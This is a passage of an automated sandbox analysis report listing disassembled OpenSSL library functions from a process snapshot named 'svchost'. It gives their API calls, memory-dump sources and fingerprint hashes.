                                                                                              • API ID: H_newH_set_thunksO_zalloc
                                                                                              • String ID: ssl\quic\quic_ackm.c
                                                                                              • API String ID: 1913221612-1180045938
                                                                                              • Opcode ID: 312ca6fd29102169aac6c21b5ef1355aa77e5f7e5199564f8895cfdd037a6007
                                                                                              • Instruction ID: 576f90e6f6a360f4f13848c579abaff04e5052ad04b25e7b18cb766d18a1a2dd
                                                                                              • Opcode Fuzzy Hash: 312ca6fd29102169aac6c21b5ef1355aa77e5f7e5199564f8895cfdd037a6007
                                                                                              • Instruction Fuzzy Hash: 2E51BE72A0AB5582E755CB34F8802AA73A0FB44794F548236DFAD437A5EF3CE195C740
                                                                                              Function 00007FFBAB490B30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B6B
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B8B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BA6
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BCD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BE8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc$O_malloc
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2040210391-3166991913
                                                                                              • Opcode ID: 6cda075becab3af0e788c9a77e8d74d6d8312209e2894be365d782e07b669772
                                                                                              • Instruction ID: dfd6306a41d689d8519da65bc13022514e56d8753f5541ede7e7aa30b668b6ab
                                                                                              • Opcode Fuzzy Hash: 6cda075becab3af0e788c9a77e8d74d6d8312209e2894be365d782e07b669772
                                                                                              • Instruction Fuzzy Hash: 4A21B0B2A1A61285EA22DF66E8810BD37A1FB44BC4F488435DF6D03B65EF3DE905C700
                                                                                              Function 64947650 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlCaptureContext.KERNEL32 ref: 64947664
                                                                                              • RtlLookupFunctionEntry.KERNEL32 ref: 6494767B
                                                                                              • RtlVirtualUnwind.KERNEL32 ref: 649476BD
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 64947704
                                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 64947711
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64947717
                                                                                              • TerminateProcess.KERNEL32 ref: 64947725
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3266983031-0
                                                                                              • Opcode ID: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                                                                                              • Instruction ID: 438d6b427901decc57405f96a3468465558ffb2b952defd0a2bb9f003901ed9e
                                                                                              • Opcode Fuzzy Hash: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                                                                                              • Instruction Fuzzy Hash: 6E210479691B0089EB088F65F85478A37FAF749B88F540226DE4D47725EF3AC16AC720
                                                                                              Function 00007FFBAB4123C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleO_free$CriticalDeleteSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 229191846-2915021490
                                                                                              • Opcode ID: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                              • Instruction ID: 52a6a7c5a5a1b42190cf0bcb471e9a2f0751981de75e28b7965b7d1b52e276f7
                                                                                              • Opcode Fuzzy Hash: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                              • Instruction Fuzzy Hash: 9D011AB6A1AA5281EB529F36F89137C2760AB85F89F08C135DE2D477A6DF3CD4448701
                                                                                              Function 00007FFBAB418812 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_strdupR_newR_set_debug
                                                                                              • String ID: ssl3_ctx_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 1600027128-173183182
                                                                                              • Opcode ID: 3ca51c3792552783a2c0ff9086fbf793306b87b3daf39207b7d216cc3670f9e0
                                                                                              • Instruction ID: 5757204e75b43ee2546aa4d161eb6ad24294e67a794d054e27ede037487a17e0
                                                                                              • Opcode Fuzzy Hash: 3ca51c3792552783a2c0ff9086fbf793306b87b3daf39207b7d216cc3670f9e0
                                                                                              • Instruction Fuzzy Hash: 18F069F0A5BB4391EA239772E4822B96315BF40B44F808436EC2D0A6B9DE2EE6448300
                                                                                              Function 00007FFBAB45A7D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A7EC
                                                                                              • OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A7FF
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A808
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A811
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A826
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_free$H_doall_argH_set_down_loadO_free
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 2477462044-3923830422
                                                                                              • Opcode ID: dffbc30bfe1f6889df76042a01ab6e2ac6416a65dd5eb904e9285d5f2a8e0ae5
                                                                                              • Instruction ID: c3264c524afbecf3e7831a3c8f8540a455c173706a2c2c7e6b4825cd8f113ea5
                                                                                              • Opcode Fuzzy Hash: dffbc30bfe1f6889df76042a01ab6e2ac6416a65dd5eb904e9285d5f2a8e0ae5
                                                                                              • Instruction Fuzzy Hash: 7DF012D1F5665241EE26EB76C8911BC1211AF85B84F44D431DD2E4B3B7DD2CE5568340
                                                                                              Function 00007FFBAB45C700 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 468COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C786
                                                                                              • memcmp.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C8CC
                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C92E
                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45CAD6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$O_mallocmemcmp
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 2178029887-3047069087
                                                                                              • Opcode ID: 4c1496c444f16a2a0f5bc286ecd1d9fdfb9f04a9237b887a38a36bddd5ff88de
                                                                                              • Instruction ID: 1a2f70d9c0f24edcded2e1da0b6ac740513a41afbce52319d614726322a39cb7
                                                                                              • Opcode Fuzzy Hash: 4c1496c444f16a2a0f5bc286ecd1d9fdfb9f04a9237b887a38a36bddd5ff88de
                                                                                              • Instruction Fuzzy Hash: 12223C72A0AF8586DA65CB35E440BE973A4FB48794F048235DFAD877A5DF38E4A4C700
                                                                                              Function 00007FFBAB491090 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 229COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB491211
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB491227
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB49123C
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B6B
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B8B
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BA6
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4913CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocO_zalloc
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2830562681-3166991913
                                                                                              • Opcode ID: d83a66066ae5636d6b4d97176491b3414c7492b4bd5f11882a96509cbec7bff4
                                                                                              • Instruction ID: 83a7bcc9ac9ca66f5aa82856338f232875f253ec46091212313214e773d4838d
                                                                                              • Opcode Fuzzy Hash: d83a66066ae5636d6b4d97176491b3414c7492b4bd5f11882a96509cbec7bff4
                                                                                              • Instruction Fuzzy Hash: C9A1F4B2A0AA8196EB22CB39D8812BC7760FB45784F448132DF9D47BA6DF3DE154C700
                                                                                              Function 00007FFBAB41CAB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_free$O_freeY_free
                                                                                              • String ID: ssl\ssl_cert.c
                                                                                              • API String ID: 3239439570-188639428
                                                                                              • Opcode ID: 6bb095c8f9aef18bce750bdd1279004616ea97981b92b7422bcf0133477a0dfa
                                                                                              • Instruction ID: 3c6904069efda53207bf60c1a17d6a556afb91f0568757891c4f4e602a8bcfd6
                                                                                              • Opcode Fuzzy Hash: 6bb095c8f9aef18bce750bdd1279004616ea97981b92b7422bcf0133477a0dfa
                                                                                              • Instruction Fuzzy Hash: 6911BC72A0AB41C6D7209F22F48112C7774FB48F84F188025EF9E07B6ACF38E4A18344
                                                                                              Function 00007FFBAB462F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F1A
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F38
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F40
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_free$O_freeX_free
                                                                                              • String ID: ssl\quic\quic_srtm.c
                                                                                              • API String ID: 2794152495-1571964953
                                                                                              • Opcode ID: e2870735cec845b42c3d1ca28eb847575685145cba8967dd3db79348a2e61ecb
                                                                                              • Instruction ID: d5b2f6bac7e82f999526c050394d72910ced7f396b938e7a1d6cc665d9394a32
                                                                                              • Opcode Fuzzy Hash: e2870735cec845b42c3d1ca28eb847575685145cba8967dd3db79348a2e61ecb
                                                                                              • Instruction Fuzzy Hash: 30F012D1B5B54255EE66E775C8A127C6310AF44B40F48C035ED2E4B3F7DE2CD9458345
                                                                                              Function 00007FFBAB434840 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlock$D_read_lockH_retrievememcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3379989983-0
                                                                                              • Opcode ID: be1e338d4e7217e3048429955079fd35ba8689d6c80043d53dff205ba1ff51c0
                                                                                              • Instruction ID: a3e81ce58440d1029a62cd138eb0c39e5d16cf9cb180977fedb74035ea05f9c5
                                                                                              • Opcode Fuzzy Hash: be1e338d4e7217e3048429955079fd35ba8689d6c80043d53dff205ba1ff51c0
                                                                                              • Instruction Fuzzy Hash: 1541B0A270668186FA669B76D4947FE63A0FF85B94F088032EE5D477A1DF3CE4418B00
                                                                                              Function 00007FFBAB47A2E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_bytes_exO_mallocmemset
                                                                                              • String ID: ssl\record\methods\tls_pad.c
                                                                                              • API String ID: 2022753641-3220453346
                                                                                              • Opcode ID: ee83614cf363710f640853747b9789f90360a22163c5f64d57f8bf6ac759705d
                                                                                              • Instruction ID: d7b70a12f4c0706b71e98c139e00d938f56b873bdf67c367ab3a8b8186bb26b5
                                                                                              • Opcode Fuzzy Hash: ee83614cf363710f640853747b9789f90360a22163c5f64d57f8bf6ac759705d
                                                                                              • Instruction Fuzzy Hash: A96121B371A7D586EE22CF35E4146AAA7A1F749B84F088231EE9D47B44EE3CD185C700
                                                                                              Function 00007FFBAB4607D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460843
                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460951
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460A08
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocmemcpy
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/ring_buf.h
                                                                                              • API String ID: 2350084802-3109175187
                                                                                              • Opcode ID: a135ff95a1ce67f957dd76ecf33de04296c39306f548a94a0c1ed77871e96678
                                                                                              • Instruction ID: d08c055e1c1d6cfb731af8762f08e5be7a280d333705d6609a033013ea73f561
                                                                                              • Opcode Fuzzy Hash: a135ff95a1ce67f957dd76ecf33de04296c39306f548a94a0c1ed77871e96678
                                                                                              • Instruction Fuzzy Hash: 41519F62B19B8182EA21CF25F54036ABBA5FB94BD4F188035EE9D07B64DF3CD099C700
                                                                                              Function 00007FFBAB45AC50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45AC74
                                                                                              • OSSL_ERR_STATE_new.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45ACBC
                                                                                                • Part of subcall function 00007FFBAB4521E0: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB45221D
                                                                                                • Part of subcall function 00007FFBAB4521E0: BIO_ctrl.LIBCRYPTO-3-X64 ref: 00007FFBAB452253
                                                                                                • Part of subcall function 00007FFBAB4521E0: BIO_ctrl.LIBCRYPTO-3-X64 ref: 00007FFBAB45226A
                                                                                                • Part of subcall function 00007FFBAB463040: RAND_priv_bytes_ex.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46307B
                                                                                                • Part of subcall function 00007FFBAB463040: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463097
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630B5
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_CTX_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630C6
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630FE
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463113
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46313C
